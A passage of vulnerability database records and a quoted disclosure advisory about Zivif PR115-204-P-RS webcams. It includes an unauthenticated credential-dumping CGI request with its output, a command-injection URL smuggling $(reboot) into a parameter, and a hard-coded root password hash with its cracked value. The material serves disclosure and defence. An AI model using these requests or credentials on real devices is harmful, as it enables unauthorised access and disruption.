          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Silas Cutler",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "145386"
      }
    ],
    "trust": 0.1
  },
  "cve": "CVE-2017-17106",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 10.0,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 10.0,
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "HIGH",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Complete",
            "baseScore": 10.0,
            "confidentialityImpact": "Complete",
            "exploitabilityScore": null,
            "id": "CVE-2017-17106",
            "impactScore": null,
            "integrityImpact": "Complete",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "High",
            "trust": 0.9,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 10.0,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 10.0,
            "id": "CNVD-2018-01359",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "HIGH",
            "trust": 0.6,
            "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "COMPLETE",
            "baseScore": 10.0,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 10.0,
            "id": "VHN-108095",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "HIGH",
            "trust": 0.1,
            "vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "NVD",
            "availabilityImpact": "HIGH",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 3.9,
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Network",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 9.8,
            "baseSeverity": "Critical",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "CVE-2017-17106",
            "impactScore": null,
            "integrityImpact": "High",
            "privilegesRequired": "None",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2017-17106",
            "trust": 1.8,
            "value": "CRITICAL"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2018-01359",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201712-146",
            "trust": 0.6,
            "value": "CRITICAL"
          },
          {
            "author": "VULHUB",
            "id": "VHN-108095",
            "trust": 0.1,
            "value": "HIGH"
          },
          {
            "author": "VULMON",
            "id": "CVE-2017-17106",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2018-01359"
      },
      {
        "db": "VULHUB",
        "id": "VHN-108095"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-17106"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-011811"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-17106"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201712-146"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Credentials for Zivif PR115-204-P-RS V2.3.4.2103 Webcams can be obtained by an unauthenticated remote attacker using a standard web /cgi-bin/hi3510/param.cgi?cmd=getuser HTTP request. This vulnerability exists because of a lack of authentication checks in requests to CGI pages. Zivif Web The camera contains a vulnerability related to certificate and password management.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. The ZivifPR115-204-P-RS is a network camera device. Attack vector: Remote\nAuthentication: None\nResearcher: Silas Cutler `p1nk` \u003csilas.cutler@blacklistthisdomain.com\u003e\nRelease date: December 10, 2017\nFull Disclosure: 90 days\nCVEs: CVE-2017-17105, CVE-2017-17106, and CVE-2017-17107\nVulnerable Device: Zivif PR115-204-P-RS\nVersion: V2.3.4.2103\n\n\nTimeline:\n1 September 2017: Initial alerting to Zivif\n1 September 2017: Zivif contact established. \n3 September 2017: Details provided. \n7 September 2017: Confirmation of vulnerabilities from Zivif\n5 December 2017: Public note on Social Media CVE-2017-17105,\nCVE-2017-17106, and CVE-2017-17107 would be included in HackerStrip comic. \n10 December 2017: This email\n\n\n-[Overview]-\nImplementation of access controls is Zivif cameras is severely lacking. 
\n\nThis was first identified with the following request (CVE-2017-17106)\nhttp://\u003cCamera Address\u003e/web/cgi-bin/hi3510/param.cgi?cmd=getuser\nCameras respond to this with:\n\nvar name0=\"admin\"; var password0=\"admin\"; var authLevel0=\"255\"; var\nname1=\"guest\"; var password1=\"guest\"; var authLevel1=\"3\"; var\nname2=\"admin2\"; var password2=\"admin\"; var authLevel2=\"3\"; var name3=\"\";\nvar password3=\"\"; var authLevel3=\"3\"; var name4=\"\"; var password4=\"\";\nvar authLevel4=\"3\"; var name5=\"\"; var password5=\"\"; var authLevel5=\"3\";\nvar name6=\"\"; var password6=\"\"; var authLevel6=\"3\"; var name7=\"\"; var\npassword7=\"\"; var authLevel7=\"3\"; var name8=\"\"; var password8=\"\"; var\nauthLevel8=\"0\"; var name9=\"\"; var password9=\"\"; var authLevel9=\"0\nCredentials are returned in cleartext to the requester. \n\nIn exploring, unauthenticated remote command injection is possible using\n(CVE-2017-17105)\nhttp://\u003cCamera\nIP\u003e/cgi-bin/iptest.cgi?cmd=iptest.cgi\u0026-time=\"1504225666237\"\u0026-url=$(reboot)\n\nCommand results are not returned, however are executed by the system. \n\nOne last findings was the /etc/passwd file contains the following\nhard-coded entry (CVE-2017-17107):\nroot:$1$xFoO/s3I$zRQPwLG2yX1biU31a2wxN/:0:0::/root:/bin/sh\n\nThe encrypted password is cat1029. \n\n(none) login: root\nPassword:\nLogin incorrect\n(none) login: root\nPassword:\nWelcome to SONIX. \n\\u@\\h:\\W$\nBecause of the way the file system is structured, changing this password\nrequires more work then running passwd. \n\n-[Note]-\nThe hi3510 is shared with a couple other cameras I\u0027m exploring.  The\nmotd saying /Welcome to SONIX/ has lead me to speculate parts of this\nfirmware may be shared with other cameras. \n\n\n\n-Silas\n\n\n\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2017-17106"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-011811"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2018-01359"
      },
      {
        "db": "VULHUB",
        "id": "VHN-108095"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-17106"
      },
      {
        "db": "PACKETSTORM",
        "id": "145386"
      }
    ],
    "trust": 2.43
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2017-17106",
        "trust": 3.3
      },
      {
        "db": "PACKETSTORM",
        "id": "145386",
        "trust": 3.3
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-011811",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201712-146",
        "trust": 0.7
      },
      {
        "db": "CNVD",
        "id": "CNVD-2018-01359",
        "trust": 0.6
      },
      {
        "db": "VULHUB",
        "id": "VHN-108095",
        "trust": 0.1
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-17106",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2018-01359"
      },
      {
        "db": "VULHUB",
        "id": "VHN-108095"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-17106"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-011811"
      },
      {
        "db": "PACKETSTORM",
        "id": "145386"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-17106"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201712-146"
      }
    ]
  },
  "id": "VAR-201712-0829",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2018-01359"
      },
      {
        "db": "VULHUB",
        "id": "VHN-108095"
      }
    ],
    "trust": 1.325
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2018-01359"
      }
    ]
  },
  "last_update_date": "2023-12-18T12:37:03.667000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Top Page",
        "trust": 0.8,
        "url": "http://zivif.com/"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-011811"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-522",
        "trust": 1.1
      },
      {
        "problemtype": "CWE-255",
        "trust": 0.9
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-108095"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-011811"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-17106"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 3.3,
        "url": "http://packetstormsecurity.com/files/145386/zivif-pr115-204-p-rs-2.3.4.2103-bypass-command-injection-hardcoded-password.html"
      },
      {
        "trust": 2.6,
        "url": "https://twitter.com/silascutler/status/938052460328968192"
      },
      {
        "trust": 1.8,
        "url": "http://seclists.org/fulldisclosure/2017/dec/42"
      },
      {
        "trust": 0.9,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-17106"
      },
      {
        "trust": 0.8,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-17106"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/522.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "http://\u003ccamera"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-17107"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-17105"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2018-01359"
      },
      {
        "db": "VULHUB",
        "id": "VHN-108095"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-17106"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-011811"
      },
      {
        "db": "PACKETSTORM",
        "id": "145386"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-17106"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201712-146"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2018-01359"
      },
      {
        "db": "VULHUB",
        "id": "VHN-108095"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-17106"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-011811"
      },
      {
        "db": "PACKETSTORM",
        "id": "145386"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-17106"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201712-146"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2018-01-19T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2018-01359"
      },
      {
        "date": "2017-12-19T00:00:00",
        "db": "VULHUB",
        "id": "VHN-108095"
      },
      {
        "date": "2017-12-19T00:00:00",
        "db": "VULMON",
        "id": "CVE-2017-17106"
      },
      {
        "date": "2018-01-29T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2017-011811"
      },
      {
        "date": "2017-12-13T16:50:24",
        "db": "PACKETSTORM",
        "id": "145386"
      },
      {
        "date": "2017-12-19T02:29:41.597000",
        "db": "NVD",
        "id": "CVE-2017-17106"
      },
      {
        "date": "2017-12-05T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201712-146"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2018-01-19T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2018-01359"
      },
      {
        "date": "2019-10-03T00:00:00",
        "db": "VULHUB",
        "id": "VHN-108095"
      },
      {
        "date": "2019-10-03T00:00:00",
        "db": "VULMON",
        "id": "CVE-2017-17106"
      },
      {
        "date": "2018-01-29T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2017-011811"
      },
      {
        "date": "2019-10-03T00:03:26.223000",
        "db": "NVD",
        "id": "CVE-2017-17106"
      },
      {
        "date": "2019-10-23T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201712-146"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201712-146"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Zivif Web Vulnerabilities related to certificate / password management in cameras",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-011811"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "trust management problem",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201712-146"
      }
    ],
    "trust": 0.6
  }
}

VAR-201712-0828

Vulnerability from variot - Updated: 2023-12-18 12:37

Zivif PR115-204-P-RS V2.3.4.2103 and V4.7.4.2121 (and possibly in-between versions) web cameras are vulnerable to unauthenticated, blind remote command injection via CGI scripts used as part of the web interface, as demonstrated by a cgi-bin/iptest.cgi?cmd=iptest.cgi&-time="1504225666237"&-url=$(reboot) request. Zivif web cameras contain a command injection vulnerability. Information may be obtained or altered, and service operation may be disrupted (DoS). The Zivif PR115-204-P-RS is a network camera device. A remote command injection vulnerability exists in the Zivif PR115-204-P-RS 2.3.4.2103 release. A remote attacker can exploit this vulnerability to inject arbitrary commands. This vulnerability stems from the fact that the network system or product does not correctly filter special elements in the process of constructing executable commands from external input data.

Attack vector: Remote
Authentication: None
Researcher: Silas Cutler `p1nk` <silas.cutler@blacklistthisdomain.com>
Release date: December 10, 2017
Full Disclosure: 90 days
CVEs: CVE-2017-17105, CVE-2017-17106, and CVE-2017-17107
Vulnerable Device: Zivif PR115-204-P-RS
Version: V2.3.4.2103

Timeline:
1 September 2017: Initial alerting to Zivif
1 September 2017: Zivif contact established.
3 September 2017: Details provided.
7 September 2017: Confirmation of vulnerabilities from Zivif
5 December 2017: Public note on Social Media CVE-2017-17105, CVE-2017-17106, and CVE-2017-17107 would be included in HackerStrip comic.
10 December 2017: This email

-[Overview]-
Implementation of access controls in Zivif cameras is severely lacking. As a result, CGI functions can be called directly, bypassing authentication checks.

This was first identified with the following request (CVE-2017-17106)
http://<Camera Address>/web/cgi-bin/hi3510/param.cgi?cmd=getuser
Cameras respond to this with:

var name0="admin"; var password0="admin"; var authLevel0="255";
var name1="guest"; var password1="guest"; var authLevel1="3";
var name2="admin2"; var password2="admin"; var authLevel2="3";
var name3=""; var password3=""; var authLevel3="3";
var name4=""; var password4=""; var authLevel4="3";
var name5=""; var password5=""; var authLevel5="3";
var name6=""; var password6=""; var authLevel6="3";
var name7=""; var password7=""; var authLevel7="3";
var name8=""; var password8=""; var authLevel8="0";
var name9=""; var password9=""; var authLevel9="0

Credentials are returned in cleartext to the requester.

One last finding was that the /etc/passwd file contains the following hard-coded entry (CVE-2017-17107):
root:$1$xFoO/s3I$zRQPwLG2yX1biU31a2wxN/:0:0::/root:/bin/sh

The encrypted password is cat1029.

(none) login: root
Password:
Login incorrect
(none) login: root
Password:
Welcome to SONIX.
\u@\h:\W$

Because of the way the file system is structured, changing this password requires more work than running passwd.

-[Note]-
The hi3510 is shared with a couple other cameras I'm exploring. The motd saying /Welcome to SONIX/ has led me to speculate parts of this firmware may be shared with other cameras.

-Silas


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201712-0828",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "pr115-204-p-rs",
        "scope": "eq",
        "trust": 3.0,
        "vendor": "zivif",
        "version": "2.3.4.2103"
      },
      {
        "model": "pr115-204-p-rs",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "zivif",
        "version": "4.7.4.2121"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2018-01360"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-011810"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-17105"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201712-147"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:zivif:pr115-204-p-rs_firmware:4.7.4.2121:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:zivif:pr115-204-p-rs_firmware:2.3.4.2103:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:zivif:pr115-204-p-rs:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2017-17105"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Silas Cutler",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "145386"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201712-147"
      }
    ],
    "trust": 0.7
  },
  "cve": "CVE-2017-17105",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 10.0,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 10.0,
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "HIGH",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Complete",
            "baseScore": 10.0,
            "confidentialityImpact": "Complete",
            "exploitabilityScore": null,
            "id": "CVE-2017-17105",
            "impactScore": null,
            "integrityImpact": "Complete",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "High",
            "trust": 0.9,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 10.0,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 10.0,
            "id": "CNVD-2018-01360",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "HIGH",
            "trust": 0.6,
            "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "COMPLETE",
            "baseScore": 10.0,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 10.0,
            "id": "VHN-108094",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "HIGH",
            "trust": 0.1,
            "vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "NVD",
            "availabilityImpact": "HIGH",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 3.9,
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Network",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 9.8,
            "baseSeverity": "Critical",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "CVE-2017-17105",
            "impactScore": null,
            "integrityImpact": "High",
            "privilegesRequired": "None",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2017-17105",
            "trust": 1.8,
            "value": "CRITICAL"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2018-01360",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201712-147",
            "trust": 0.6,
            "value": "CRITICAL"
          },
          {
            "author": "VULHUB",
            "id": "VHN-108094",
            "trust": 0.1,
            "value": "HIGH"
          },
          {
            "author": "VULMON",
            "id": "CVE-2017-17105",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2018-01360"
      },
      {
        "db": "VULHUB",
        "id": "VHN-108094"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-17105"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-011810"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-17105"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201712-147"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
